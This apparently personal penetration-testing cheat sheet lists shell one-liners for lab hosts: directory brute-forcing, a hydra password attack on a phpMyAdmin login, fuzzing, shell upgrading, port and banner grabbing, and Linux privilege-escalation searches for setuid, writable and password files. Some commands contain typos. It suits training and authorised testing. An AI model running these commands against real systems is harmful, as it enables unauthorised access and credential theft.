# bruteforce dir over http proxy
gobuster dir -u http://10.11.1.73/ -w /usr/share/wordlists/seclist/web/raft-large-directories.txt -t 40 -e -o dir2.txt -p http://127.0.0.1:8080 

#brutefore login -V => failcondition -L for userlist
 hydra -l root -P /usr/share/wordlists/rockyou.txt 10.11.1.234 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1$target=index.php&token=e7ec6798bb4d451e587a62cfb00fe077=+In:input_password" -V
     
#fuzz  anything :)
wfuzz -c -z file,/usr/share/wordlists/seclist/web/raft-large-directories.txt --hh 99  http://10.11.1.133/FUZZ
bfuzz -c -z file,users.txt -z file,pass.txt — sc 200  http://www.site.com/log.asp?user=FUZZ&pass=FUZ2Z


#python spanshell
python -c 'import pty;pty.spawn("/bin/bash");' # pysh

#get openhttp ports
cat nmap/scan1 | grep "open.*http" | grep -oE "^[0-9]*" > openhttp.txt    #httpgrabber

#get open ports
cat nmap/scan1 | grep "open.*" | grep -oE "^[0-9]*" > openports.txt #portgrabber

#ip grep
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" > ips.txt   #ipgrabber

#get banners from ports
for i in $(cat openports.txt);do echo "$i:" >> banners.txt; echo -en "GET /\r\n\r\nhelp\r\n\r\n" | nc -nvq 20 $ip $i >> banners.txt &&  echo -e "\n\n">> banners.txt;done #bannergrabber

#my usual scan
nmap -sC -p- -vv --reason -sV -Pn -sS -O -oN scan1 $ip








#linux priv esc stuff

#finds all files that belong to your groups
for gid in $(id| cut -d '=' -f4- | grep -o "[0-9]*") ;do find / -group $gid -type f -exec ls -la {} 2>/dev/null \;;done | grep -v "proc"

#finds bak conf and passw files
find / f -name "*.bak" -o -name "*passw*" -o "*config*" -perm -004 2>/dev/null

# a bunch of setuid stuff
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -4000 -o -perm -2000 -type f 2>/dev/null 
find / -perm -4000 -o -perm -2000 -type f -exec ls -la {} 2>/dev/null \;
find / -group gidhere -type f -exec ls -la {} 2>/dev/null\;

#files owned by root that are writeable
find / -user root -perm -002 -type f -not -path "/proc/*"  2>/dev/null

# any writeable file that arent owne by u
find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null





#get file permission on the PATH
for i in $(echo $PATH | sed -r "s/:/\t/g");do ls -lad $i;done

#gets all processes running as root as path
ps aux | grep "root" | grep -v "\[" | grep -oE "[0-9]{1,2}:[0-9]{1,2} [a-zA-Z|\/]*" | grep -o "[a-zA-Z|\/]*"
ps aux | grep "root" | grep -v "\[" | grep -oE "[0-9]{1,2}:[0-9]{1,2} [a-zA-Z|\/]*" | grep -o "[a-zA-Z|\/]*" | ls -la
